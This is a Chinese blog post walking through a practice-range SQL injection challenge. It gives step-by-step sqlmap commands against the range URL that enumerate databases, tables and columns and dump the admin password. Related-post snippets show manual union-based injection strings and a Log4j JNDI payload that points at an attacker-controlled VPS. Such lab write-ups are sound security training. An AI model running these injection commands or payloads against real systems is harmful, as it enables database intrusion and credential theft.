封神台——第一题:为了女神小芳

最新推荐文章于 2022-04-06 23:37:41 发布
最新推荐文章于 2022-04-06 23:37:41 发布
阅读量694 收藏 4
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/112744675
版权

题目:获取数据库管理员密码

题目传送阵

渗透步骤

       第一步:点击“点击查看新闻”超链接,跳转到一个页面,url发生改变,设想这个页面存在sql漏洞。
在这里插入图片描述
       第二步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch,使用sqlmap对该页面进行扫描,看该页面是否存在漏洞,从结果得知可以从基于布尔以及时间的盲注进行攻击。
在这里插入图片描述
       第三步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch --dbs 查看数据库,发现maoshe数据库,结合页面,猜测需要获取的密码存在于这个数据库里面.
在这里插入图片描述
       第四步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe --tables查看maoshe数据库里面的表,发现admin这个表。
在这里插入图片描述
       第五步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin --columns查看admin里面的内容,发现用户名以及密码。
在这里插入图片描述
       第六步:输入sqlmap.py -u "http://59.63.200.79:8003/?id=1" --batch -D maoshe -T admin -C "username,password" --dump查看用户名以及密码,之后提交密码“hellohack”即可。
在这里插入图片描述

想学习安全的小白
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
神台----尤里的复仇I-第一章:为了女神小芳
正在学习的路上...
07-17 3006
1.找注入点 ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 2.猜列数、报显示位 ?id=1 order by 2 ------查询了两列 ?id=466454 select 1,2 ------将id设为一个不存在的数...
神台基础关,第一
weixin_44106116的博客
11-19 1737
1.判断是否存在SQL注入 点击新闻,看到了地址栏变化,产生了id传参 分别输入,and 1=1 和,and 1=2 显示页面不同,所以,存在sql注入 2.查询字段数,好用联合查询 order by 2 有显示,order by 3 无显示,可知此条语句字段数为2 在之后输入 and 1=2 union select 1,2 注销掉前方的查询语句,查看回显点, 新闻内容中显示了数字2 根据...
注入(一)
tomyyyyy
06-28 277
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
神台-靶场-第一章:为了女神小芳!(解)+ 中北网安实训笔记-(20200701)-sql注入基本语法
tonyhapply的博客
07-18 1565
我们先来学习sql注入,
神台在线靶场--尤里的复仇Ⅰ 小芳!【8
feiniaotjx的博客
10-20 9272
靶场练习 神台-掌控安全在线演练靶场 第一章:为了女神小芳
神台-SQL注入实战靶场1-4过程
qq_43367379的博客
05-19 1027
背景 这是最基本的显错注入 已经给出SQL查询语句 select * from user where id=1 不需要先去判断是字符型还是数字型,去一步一步测出sql查询语句了 废话不多说,直接上解步骤 1.在url地址栏上 ?id=1 后面拼接 order by 3 说明: 所有操作都是在地址栏上拼接字符串实现的,没有借助工具 https://...?id=1 order by 3 结果为 正确显示 当前用户的账号和密码 2.在url地址栏上 ?id=1 后面拼接 order by 4 https://
神台-杂项8:奇怪的短信
最新发布
03-11
随波逐流工具,一个非常好用的解码工具
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
通达信2指标——射箭神(副图).doc
07-30
通达信2指标——射箭神(副图).doc
通达信指标——射箭神(副图).doc
07-30
通达信指标——射箭神(副图).doc
网络靶场的靶子——网络蓝军
03-01
网络靶场的标的物,红军的目标靶子。有请网络牛人小试牛刀,闯关有奖!
更改支付金额(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
SQL注入漏洞_神台第一
gou1791241251的博客
12-13 749
SQL注入漏洞_神榜第一关 http://59.63.200.79:8003/?id=1 一、观察疑似可注入点 ?id=1 二、尝试输入单引号和双引号 使用hackbar进行测试比较好 以下是正常显示的结果 以下是输入单引号或双引号的结果 输入单引号时发现页面的内容不见了。同样试试双引号 同样也是一样的结果。在输入–+注释后面的SQL代码时还是同样的页面显示。由此可以判定这一关是数字型注入。那么可以测试一下把双引号或单引号去掉试试看 此时发现页面是正常显示的。如第一张图片。 验证了这个是数字型注入。
掌控者-神台-Apache Log4j任意代码执行复现
weixin_43821278的博客
04-06 5626
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Apache Log4j任意代码执行复现一、工具二、靶场三、步骤总结 一、工具 JNDIExploit-1.2-SNAPSHOT.jar 二、靶场 看网页源码 猜测就是username和password为注入点 三、步骤 vps有java环境 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP 成功运行 向密码框填入${jndi:ldap://vps的IP:1389/Basic/Comm.
如何使用sqlmap破解神台靶场第一
weixin_44490353的博客
12-17 1594
文章目录一.查看是否有注入二.查找当前数据库三.查询数据库的表四.查询表中的列五.查询具体内容 一.查看是否有注入 使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch -u指令为查看网址的url是否有漏洞。-batch为永远不要求用户输入信息,默认执行。 我们可以看到,存在sql注入漏洞。 二.查找当前数据库 mysql.py -u http://59.63.200.79:8003/?id=1 -current-db -batch -cuurent
sql简单注入-------基本步骤
xiaoduanDDG的博客
10-27 1265
神台靶场,第一道拯救女神小芳-猫舍的作为例子 1.判断与数据库交互的地方是否存在注入点 方法:加入单引号'使数据库报错,说明存在注入点 2.判断字段数 用orderby或者group by 59.63.200.79:8003/?id=1 order by 1 //如果不报错则至少要有一个字段,进行第二个测试,直到报错为止 59.63.200.79:8003/...
神台第二关
weixin_44106116的博客
11-21 2164
1第一种方法 1 查看是否能够SQL注入 点开第一个新闻,用and 1=1 查看是否存在SQL注入,发现弹出禁用参数对话框 再使用order by ,查看共有几个字段,发现order by 可以用,共十个 因为网页的防护,一般只拦截GET和POST,忽略了cookie也可以传参。所以尝试cookie注入 1.1附加知识点 cookie 类型为“小型文本文件”,是网站给客户端的身份证,由客户端暂时或...
sqlmap的使用 (以神台目为例)
yangtailang94666的博客
10-11 1325
一、sqlmap选项 目标:至少要选中一个参数 -u URL, --url=URL 目标为 URL (例如. "http://www.site.com/vuln.php?id=1") -g GOOGLEDORK 将谷歌dork的结果作为目标url 请求: 这些选项可用于指定如何连接到目标URL --data=DATA 数据字符串通过POST发送 --cookie=COOKIE HTTP Cookie的值 ...
ctf实战 掌控安全的靶场 第三关通关记录
wh1te 小白的博客
09-20 3427
掌控安全神台第三关  根据目可能要用burp进行抓包,点击传送门进入目主页 之前目说的扫描到新的后台地址admin123 在网址后加入admin123 进入新的后台管理页面 根据第二关得到的用户和密码进行登录  进入后得到这样一个页面 抓包结果如下 根据代码分析只需要修改host和referer的ip地址 修改以后结果还是进不去 分析一下问  打开F...
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和实例,帮助读者从初学者成长为能够独立完成三维设计与制作的专业人士。 该书提供了C4D软件的下载地址,读者可以通过该链接下载安装C4D软件到自己的电脑中。安装完成后,读者可以按照书中的指导步骤,逐步学习C4D的操作技巧和基本概念。从最基础的界面介绍、视图操作,到三维模型的建立、材质的添加、动画的制作等各个方面都有详细的讲解和实例演示。 随着阅读的深入,读者将学习到更高级别的技巧和应用,如灯光设置、摄像机调整、特效制作等。作者通过生动的插图和实际案例,使读者能够更好地理解并掌握C4D的使用方法。 "C4D修神记:零基础到三维神"不仅可以帮助读者快速入门C4D软件,还能够启迪读者的创作灵感,提供了丰富的设计思路和技巧。这本书的出版对于有志于学习和从事三维设计的读者来说是一次难得的机会和宝贵的参考资料。无论是对于初学者还是对于有一定基础的人士来说,这本书都能够带领他们迈向更高的技能和创作水平。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值